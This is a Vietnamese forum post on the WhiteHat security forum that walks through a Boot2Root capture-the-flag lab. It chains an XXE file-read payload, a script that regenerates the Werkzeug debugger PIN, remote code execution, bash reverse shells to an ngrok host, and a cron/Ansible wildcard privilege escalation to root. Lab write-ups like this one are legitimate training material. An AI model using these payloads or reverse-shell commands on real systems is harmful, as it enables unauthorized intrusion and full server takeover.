Writeup bài lab Boot2Root kỷ niệm sinh nhật WhiteHat

tuantran

Moderator
Thành viên BQT
27/04/2017
29
76 bài viết
Writeup bài lab Boot2Root kỷ niệm sinh nhật WhiteHat
Hế lô bà con!

Thể theo nguyện vọng của nhiều bà con muốn mình đăng writeup các bài lab Boot2Root nên hôm nay mình đăng writeup của bài Boot2Root kỷ niệm sinh nhật 10 năm WhiteHat. Ai chưa làm được bài thì có thể xem hướng dẫn của mình trong bài này nhé!

Anh minh hoa (600 × 315 px).png

Writeup Boot2Root: 10 years anniversary​

Mục tiêu: 103.178.230.155 (RCE được với user bình thường và leo quyền lên root).

Tóm tắt
 1. Dùng nmap phát hiện ra port 22 (ssh) và port 8000 (http) đang mở.
 2. Ở port 8000, trang web này bị lỗ hỏng XXE khiến cho chúng ta có thể đọc được file của server.
 3. Chế độ debug của trang web không được tắt đi nên kết hợp với lỗ hỏng XXE, chúng ta RCE được với user werkzeug.
 4. Lợi dụng lỗ hỏng trong cấu hình cronjob, chúng ta leo quyền lên user root.

Reconnaissance (Thu thập thông tin)​

Như thường lệ chúng ta sẽ dùng nmap để scan port. Câu lệnh mình hay dùng là:
nmap -sC -sV -Pn -p- -o target 103.178.230.155
Trong đó:
 • -sC: Scan với các script mặc định của nmap.
 • -sV: Scan phiên bản của các service đang chạy.
 • -Pn: Bỏ qua việc ping để kiểm tra xem có kết nối được với mục tiêu không (để hi vọng bypass firewall).
 • -o: Lưu kết quả vào file target.
Screenshot 2024-01-12 at 16.01.18.png
Screenshot 2024-01-12 at 16.02.21.png
Nhìn vào kết quả, chúng ta thấy có 2 port đang mở là 22 (ssh) và 8000 (http). Chúng ta sẽ xuất phát từ port 8000 do nó có dịch vụ web.

Tìm hiểu website​

Ở kết quả nmap, web này sử dụng python 3.11.6 và thư viện Werkzeug 2.2.2. Tìm kiếm trên google về lỗ hổng có sẵn của thư viện này thì không có 1 CVE nào thú vị nhưng đập vào mắt mình là bài viết này (và nó thực sự hữu dụng sau này).

Giao diện website thoạt nhìn qua thì chỉ có 1 trang cho phép chúng ta tìm kiếm gì đó và web chỉ hiển thị lại thứ mà ta nhập vào.
Screenshot 2024-01-12 at 16.05.40.png

Ngay lập tức mình nghĩ đến lỗ hổng Reflected XSS (cơ bản là chúng ta có thể thực thi javascript trên trình duyệt của người dùng). Test với payload <i>XSS</i> thì dính thật.

Screenshot 2024-01-12 at 16.05.58.png

Phát hiện lỗ hổng XXE​

Tuy nhiên, mục tiêu của chúng ta là RCE nên mình không quan tâm đến XSS nữa. Tiếp tục chúng ta sẽ dùng Burp Suite để theo dõi request và response của tính năng tìm kiếm này.

Screenshot 2024-01-12 at 16.11.09.png
Ta thấy rằng ta sẽ gửi một POST request tới /search với thông tin mình nhập vào ở trong cấu trúc XML. Và mình liên tưởng đến lỗ hổng XXE (cơ bản là chúng ta có thể chèn thêm các thực thể XML vào trong XML hiện tại kể cả SYSTEM). Thử với payload <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><test>&xxe;</test> thì xác nhận được là có tồn tại lỗ hỏng này

Giải thích payload:
 • <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>: Định nghĩa thực thể xxe với giá trị là nội dung của file /etc/passwd.
 • <test>&xxe;</test>: Sử dụng thực thể xxe đã định nghĩa ở trên.
Screenshot 2024-01-12 at 16.13.11.png
Với lỗ hỏng này, ta có khả năng đọc được hệ thống file dưới quyền hạn của user đang chạy web server này.

Phát hiện ra website có sử dụng debug mode​

Tiếp theo, mình thử một đường dẫn phổ biến của web là /robots.txt thì thấy response khá thú vị

Screenshot 2024-01-12 at 16.14.44.png

Tại đây ta có thêm thông tin là web này có sử dụng debug và có vẻ là thông tin về các đường dẫn:
 • admin/: Là một form đăng nhập dành cho admin. Ta hiện tại chưa có thông tin gì về user này.
Screenshot 2024-01-12 at 16.14.56.png

Thử credential admin:admin thì bị lỗi và bị lộ ra nhiều thông tin liên quan đến hệ thống file do bật Debug mode.

Screenshot 2024-01-12 at 16.15.07.png
 • [name = 'index']: Có vẻ là sử dụng param index ở đâu đó​
 • search [name = 'search']: Có thể là tính năng tìm kiếm ở trang chủ mà ta đã dùng trước đó​
Screenshot 2024-01-12 at 16.19.07.png

 • bug [name='bug']: Vào đường dẫn /bug sẽ kích hoạt ra lỗi TypeError. Điều này cũng lộ ra một phần source code của web (chưa thú vị lắm tbh)​
Tìm hiểu thêm về debug mode của thư viện Werkzeug. Ta thấy rằng đường dẫn /console sẽ mở python console và chúng ta có thể thực thi các lệnh python trên đó. Tuy nhiên, chúng ta cần phải có mã Debugger PIN mới có thể dùng được.

Kết hợp với lỗ hỏng XXE để tìm mã Debugger PIN. Từ đó dẫn đến RCE​


Quay trở lại với bài viết mà mình đã đề cập ở trên. Theo đó, chúng ta có thể tạo lại mã PIN trên nếu chúng ta biết được một số file trong hệ thống. Và nhờ lỗ hỏng XXE trên ta hoàn toàn có thể làm được điều đó.

Chúng ta cần các thông tin sau để tạo lại mã PIN:

Screenshot 2024-01-12 at 16.26.11.png

Hãy bắt đầu bởi thông tin đơn giản:

 • username: là tên của user đang chạy web server. Đó là werkzeug (file /etc/passwd)​
Screenshot 2024-01-12 at 16.29.54.png
 • str(uuid.getnode()): Là địa chỉ MAC của máy tính ở dạng số. Tìm card mạng qua file /proc/net/arp và lấy địa chỉ MAC trong file /sys/class/net/<card mạng>/address​
Screenshot 2024-01-12 at 16.30.04.png

Screenshot 2024-01-12 at 16.32.10.png
Mã:
print(0x0242ac170003)
2485378285571

 • get_machine_id(): là kết hợp của file /etc/machine-id hoặc /proc/sys/kernel/random/boot_id và phần phía sau dấu / ở dòng đầu tiên trong file /proc/self/cgroup
Screenshot 2024-01-12 at 16.34.46.png
Note: /etc/machine-id sẽ không trả gì hết nhưng không sao cả.

Vậy
Python:
get_machine_id()=a7cbe35e-bae7-4544-b5f3- 0068171268f4967e0e0070c8f5a54905b0da508bf2979f1cd7ae33ac2c427f1b726fb29be6d9
trong trường hợp của mình.

Về 3 thông tin còn lại, bài viết chỉ nói về Flask mà ta lại gặp phải Django nên không thể áp dụng được. Tuy nhiên, biết người biết ta, trăm trận trăm thắng, mình sẽ chạy Django với Werkzeug debug mode bật lên. Sử dụng chiến thuật "print2win", mình tìm source code tạo PIN của Werkzeug và nhét mấy lệnh print() vào (hàm get_pin_and_cookie_name() trong ..../python3.11/site- packages/werkzeug/debug/__init__.py)

Screenshot 2024-01-12 at 16.38.14.png


Chạy server Django với debug mode bật lên, ta sẽ thấy các thông tin được hiển thị

Screenshot 2024-01-12 at 16.38.43.png

Từ đó ta suy ra các thông tin còn lại:
 • modname: django.contrib.staticfiles.handlers​
 • getattr(app, "__name__", type(app).__name__): StaticFilesHandler​
 • getattr(mod, "__file__", None): /usr/local/lib/python3.11/site- packages/django/contrib/staticfiles/handlers.py (suy ra từ trang web thông báo lỗi)​
Screenshot 2024-01-12 at 16.41.37.png
Sử dụng đoạn script sau để tạo lại mã PIN

Python:
import hashlib
from itertools import chain
probably_public_bits = [
  'werkzeug',# username
  'django.contrib.staticfiles.handlers',# modname[/LEFT]

  StaticFilesHandler',# getattr(app, '__name__', getattr(app.__class__,
'__name__'))

  '/usr/local/lib/python3.11/site-
packages/django/contrib/staticfiles/handlers.py' # getattr(mod, '__file__', None),
]
private_bits = [
  '2485378285571',# str(uuid.getnode()), /sys/class/net/ens33/address
  'a7cbe35e-bae7-4544-b5f3-0068171268f4967e0e0070c8f5a54905b0da508bf2979f1cd7ae33ac2c427f1b726fb29be6d9'#
get_machine_id(), /etc/machine-id
]
#h = hashlib.md5() # Changed in
https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
  if not bit:
    continue
  if isinstance(bit, str):
    bit = bit.encode('utf-8')
  h.update(bit)
h.update(b'cookiesalt')
[HASH=1886]#h.update(b[/HASH]'shittysalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
  h.update(b'pinsalt')
  num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
  for group_size in 5, 4, 3:
    if len(num) % group_size == 0:
      rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
             for x in range(0, len(num), group_size))
break else:
rv = num
print(rv)

Chạy đoạn script trên, ta sẽ có được mã PIN và đó chính là mã PIN đúng.

Screenshot 2024-01-12 at 16.46.27.png


Screenshot 2024-01-12 at 16.46.56.png


Ta đã RCE thành công bằng cách thực hiện lệnh os thông qua python console
Note: Lúc đầu mình không nghĩ đến hướng này do mã PIN nếu nhập sai quá nhiều lần thì sẽ bị khóa phải khởi động lại server mới reset lại trạng thái khóa. Mình đã bị khóa một lần. Tuy nhiên, một lúc sau khi mình quay lại thì nó không còn khóa nữa. Điều này có nghĩa là server sẽ tự khởi động lại sau một khoảng thời gian nào đó và cảng củng cố thêm cho cách exploit này :>

Thiết lập reverse shell bằng ngrok và nc​


Trước hết mình cấu hình ngrok để chạy 2 tunnel cùng một lúc (1 cái cho user thường, 1 cái cho root nếu cần thiết)
Python:
$ ngrok config check
Valid configuration file at /home/kali/.config/ngrok/ngrok.yml
Chỉnh sửa file ngrok.yml như sau
authtoken: ...
tunnels:
 first:
  addr: <port>
  proto: tcp
 second:
  addr: <port>
  proto: tcp
Chạy ngrok
$ ngrok start --all

Screenshot 2024-01-12 at 16.51.01.png


Thiết lập nc listener
Bash:
$ nc -lvnp <port>

Ở python console trên web, ta sẽ thực hiện lệnh sau:
Bash:
import os; os.popen("bash -c 'bash -i >& /dev/tcp/NGROK_HOST/NGROK_PORT 0>&1'")


Câu lệnh trên lấy ở https://www.revshells.com/
Screenshot 2024-01-12 at 16.54.26.pngTa đã có shell với user werkzeug

Screenshot 2024-01-12 at 16.54.35.pngNâng cấp shell​


Việc đầu tiên khi có reverse shell là sẽ tìm cách cải thiện shell cho tốt hơn, dễ sử dụng. Do máy đã có python nên mình sẽ làm như sau:
Bash:
python -c 'import pty;pty.spawn("/bin/bash")'
Bấm CTRL+Z để đưa con shell về background

Ở máy attacker, ta sẽ dùng lệnh như sau. Ta sẽ quay lại shell của mục tiêu
Bash:
stty raw -echo; fg

Cuối cùng, chạy lệnh export TERM=xterm là xong. Ta có thể thao tác lên shell tiện lợi hơn

Chạy linPEAS phát hiện ra sự khác thường ở cron jobs​


Ở đây mình sẽ dùng linPEAS để tìm kiếm lỗ hỏng.
Bash:
wget "https://github.com/carlospolop/PEASS-ng/releases/download/20231024-
f6adaa47/linpeas.sh"
chmod +x linpeas.sh
./linpeas.sh

Kết quả cho thấy ở phần cron jobs có một file cron trong /etc/cron.d. Tuy nó không đỏ lè nhưng nó không phải màu xanh lá cho thấy file này ở đây không bình thường lắm đối với linux (linPEAS sẽ note màu xanh lá là những thứ bình thường trong máy Linux)

Screenshot 2024-01-12 at 17.00.04.png


Check luôn crontab thấy có task của root thực thi file reset_machine.sh nhưng file này mình không có bất kì quyền gì

Screenshot 2024-01-12 at 17.00.59.pngCheck file /etc/cron.d/cron. Không hiểu sao mình không cat ra được nhưng file này không có trống nên mình sẽ dùng strings thay thế thì lại ra

Bash:
strings /etc/cron.d/cron

Đây là nội dung file:

Screenshot 2024-01-12 at 17.01.08.png


Cứ mỗi 1 phút thì user root sẽ chạy lệnh /usr/local/bin/ansible-parallel /opt/automated/tasks/webapp/*.yml


Nhờ dấu * nên mình có thể tạo ra file yml bất kì và nó sẽ được thực thi. Và nếu có cách nhét được lệnh os vào file đã tạo đó thì mình sẽ leo quyền thành công.

Leo quyền lên root​


Search google về ansible shell command thì thấy bài docs này. Theo đó, mình sẽ tạo file exploit.yml với nội dung như sau:
Bash:
- hosts: localhost
 tasks:
  - name: Run command
   shell:
    cmd: bash -c 'bash -i >& /dev/tcp/NGROK_HOST/NGROK_PORT 0>&1'

Tuy nhiên, cả nano lẫn vi không có trên máy nên mình đã nghĩ dùng python kết hợp với echo -e viết vào file
Screenshot 2024-01-12 at 17.10.53.png


Screenshot 2024-01-12 at 17.11.07.png


Thiết lập nc listener

Bash:
$ nc -lvnp <port>

Đợi một lúc cho cron job chạy, ta sẽ có shell với user root

Screenshot 2024-01-12 at 17.11.16.png

Vậy là ta đã giải được bài Boot2Root này. Cảm ơn bạn đã đọc bài viết của mình. Hẹn gặp lại ở bài viết tiếp theo XD
 
Chỉnh sửa lần cuối:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Thẻ
boot2root writeup
Bên trên